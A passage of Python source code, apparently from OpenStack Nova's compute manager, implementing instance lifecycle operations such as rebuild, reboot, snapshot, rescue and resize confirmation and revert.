block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_LW("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
except Exception:
LOG.exception(_LE("Something wrong happened when trying to "
"delete snapshot from shelved instance."),
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def soft_delete_instance(self, context, instance, reservations):
"""Soft delete an instance on this host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._notify_about_instance_usage(context, instance,
"soft_delete.start")
try:
self.driver.soft_delete(instance)
except NotImplementedError:
# Fall back to just powering off the instance if the
# hypervisor doesn't implement the soft_delete method
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
quotas.commit()
self._notify_about_instance_usage(context, instance, "soft_delete.end")
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
try:
self.driver.restore(instance)
except NotImplementedError:
# Fall back to just powering on the instance if the hypervisor
# doesn't implement the restore method
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, bdms,
detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
detach_block_devices(context, bdms)
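# Only destroy the existing guest when rebuilding in place; on an
# evacuate (recreate=True) the source hypervisor is assumed to be
# unavailable.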
if not recreate:
self.driver.destroy(context, instance, network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, network_info=network_info,
block_device_info=new_block_device_info)
@object_compat
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with the given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
"""
context = context.elevated()
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this on the next major RPC version bump
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = None
orig_vm_state = instance.vm_state
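# Remember the original vm_state so an instance that was STOPPED
# before the rebuild can be powered back off once it is rebuilt
# (see the end of this method).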
with self._error_out_instance_on_exception(context, instance):
LOG.info(_LI("Rebuilding instance"), context=context,
instance=instance)
if recreate:
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
# Cover the case where the admin expects the instance files to be
# on shared storage but they are not accessible, and vice versa.
if on_shared_storage != self.driver.instance_on_disk(instance):
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info(_LI('disk on shared storage, recreating using'
' existing disk'))
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info(_LI("disk not on shared storage, rebuilding from:"
" '%s'"), str(image_ref))
# NOTE(mriedem): On a recreate (evacuate), we need to update
# the instance's host and node properties to reflect its
# destination node for the recreate.
node_name = None
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'),
self.host)
finally:
instance.host = self.host
instance.node = node_name
instance.save()
if image_ref:
image_meta = self.image_api.get(context, image_ref)
else:
image_meta = {}
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
# TODO(jaypipes): Move generate_image_url() into the nova.image.api
orig_image_ref_url = glance.generate_image_url(orig_image_ref)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
# Needed for nova-network, does nothing for neutron
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host)
network_info = compute_utils.get_nw_info_for_instance(instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
self._detach_volume(context, bdm.volume_id, instance,
destroy_bdm=False)
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
if orig_vm_state == vm_states.STOPPED:
LOG.info(_LI("bringing vm to original state: '%s'"),
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info(_LI("Detaching from volume api: %s"), volume_id)
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = (task_states.REBOOTING,
task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED)
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = (task_states.REBOOTING_HARD,
task_states.REBOOT_PENDING_HARD,
task_states.REBOOT_STARTED_HARD)
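# Saving with expected_task_state below makes the reboot fail fast
# if a concurrent operation (e.g. a delete) has already changed the
# task state.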
context = context.elevated()
LOG.info(_LI("Rebooting instance"), context=context, instance=instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
context=context, instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning(_LW('Reboot failed but instance is running'),
context=context, instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
ctxt.reraise = False
else:
LOG.error(_LE('Cannot reboot instance: %s'), error,
context=context, instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning(_LW("Instance disappeared during reboot"),
context=context, instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance, rotation):
if rotation < 0:
raise exception.RotationRequiredForBackup()
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance, rotation)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param image_id: glance.db.sqlalchemy.models.Image.Id
"""
# NOTE(dave-mcnally) the task state will already be set by the API,
# but if the compute manager crashed or was restarted before the
# request got here the task state may have been cleared, so we set
# it again and things continue normally
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# The instance may no longer exist; no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info(_LI('instance snapshotting'), context=context,
instance=instance)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image_service = glance.get_default_image_service()
image = image_service.show(context, image_id)
if image['status'] != 'active':
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Error while trying to clean up image %s"),
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
msg = _LW("Image not found during snapshot")
LOG.warning(msg, instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in xrange(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
self.image_api.delete(context, image_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info(_LI("Root password set"), instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning(_LW('set_admin_password is not implemented '
'by this driver or guest instance.'),
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception(_LE('set_admin_password failed'),
instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
LOG.warning(_LW('trying to inject a file into a non-running '
'(state: %(current_state)s expected: '
'%(expected_state)s)'),
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
LOG.info(_LI('injecting file to %s'), path,
instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
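        # Illustrative summary of the fallback chain above (added comment):
        # explicit rescue_image_ref -> the instance's stashed
        # 'image_base_image_ref' system metadata -> instance.image_ref.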
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning(_LW('Unable to find a different image to use for '
'rescue VM, using instance\'s current image'),
instance=instance)
rescue_image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(context, self.image_api,
rescue_image_ref,
instance)
# NOTE(belliott) bug #1227350 - xenapi needs the actual image id
image_meta['id'] = rescue_image_ref
return image_meta
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref=None, clean_shutdown=True):
context = context.elevated()
LOG.info(_LI('Rescuing'), context=context, instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self._get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
rescue_image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception(_LE("Error trying to Rescue Instance"),
instance=instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info(_LI('Unrescuing'), context=context, instance=instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
def _cleanup_stored_instance_types(self, instance, restore_old=False):
"""Clean up "old" and "new" instance_type information stored in
instance's system_metadata. Optionally update the "current"
instance_type to the saved old one first.
Returns the updated system_metadata as a dict, the
post-cleanup current instance type and the to-be dropped
instance type.
"""
sys_meta = instance.system_metadata
if restore_old:
instance_type = instance.get_flavor('old')
drop_instance_type = instance.get_flavor()
instance.set_flavor(instance_type)
else:
instance_type = instance.get_flavor()
drop_instance_type = instance.get_flavor('old')
instance.delete_flavor('old')
instance.delete_flavor('new')
return sys_meta, instance_type, drop_instance_type
@wrap_exception()
@wrap_instance_event
@wrap_instance_fault
def confirm_resize(self, context, instance, reservations, migration):
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
context=context, instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error(_LE("Migration %s is not found during confirmation"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
if migration.status == 'confirmed':
LOG.info(_LI("Migration %s is already confirmed"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning(_LW("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation "
"process"),
{"status": migration.status, "id": migration_id},
context=context, instance=instance)
quotas.rollback()
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info(_LI("Instance is not found during confirmation"),
context=context, instance=instance)
quotas.rollback()
return
self._confirm_resize(context, instance, quotas,
migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, quotas,
migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(danms): delete stashed migration information
sys_meta, instance_type, old_instance_type = (
self._cleanup_stored_instance_types(instance))
sys_meta.pop('old_vm_state', None)
instance.system_metadata = sys_meta
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self._get_instance_nw_info(context, instance)
self.driver.confirm_migration(migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(migration.source_node)
rt.drop_resize_claim(context, instance, old_instance_type)
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
quotas.commit()
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration, reservations):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(instance.node)
rt.drop_resize_claim(context, instance)
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute,
quotas.reservations)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, reservations, migration):
"""Finishes the second half of reverting a resize.
        Brings the original source instance state back (active/shutoff) and
        reverts the resized attributes in the database.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
sys_meta, instance_type, drop_instance_type = (
self._cleanup_stored_instance_types(instance, True))
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = sys_meta.pop('old_vm_state', vm_states.ACTIVE)
instance.system_metadata = sys_meta
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.instance_type_id = instance_type['id']
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
migration.dest_compute = migration.source_compute
with migration.obj_as_admin():
migration.save()
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
power_on = old_vm_state != vm_states.STOPPED
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info(_LI("Updating instance to original state: '%s'"),
old_vm_state)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
quotas.commit()
def _prep_resize(self, context, image, instance, instance_type,
quotas, request_spec, filter_properties, node,
clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
if same_host and not CONF.allow_resize_to_same_host:
self._set_instance_error_state(context, instance)
msg = _('destination same as source!')
raise exception.MigrationError(reason=msg)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.set_flavor(instance_type, 'new')
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker(node)
with rt.resize_claim(context, instance, instance_type,
image_meta=image, limits=limits) as claim:
LOG.info(_LI('Migrating'), context=context, instance=instance)
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, quotas.reservations,
clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown=True):
"""Initiates the process of moving a running instance to another host.
Possibly changes the RAM and disk size in the process.
"""
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
try:
self._prep_resize(context, image, instance,
instance_type, quotas,
request_spec, filter_properties,
node, clean_shutdown)
# NOTE(dgenin): This is thrown in LibvirtDriver when the
# instance to be migrated is backed by LVM.
# Remove when LVM migration is implemented.
except exception.MigrationPreCheckError:
raise
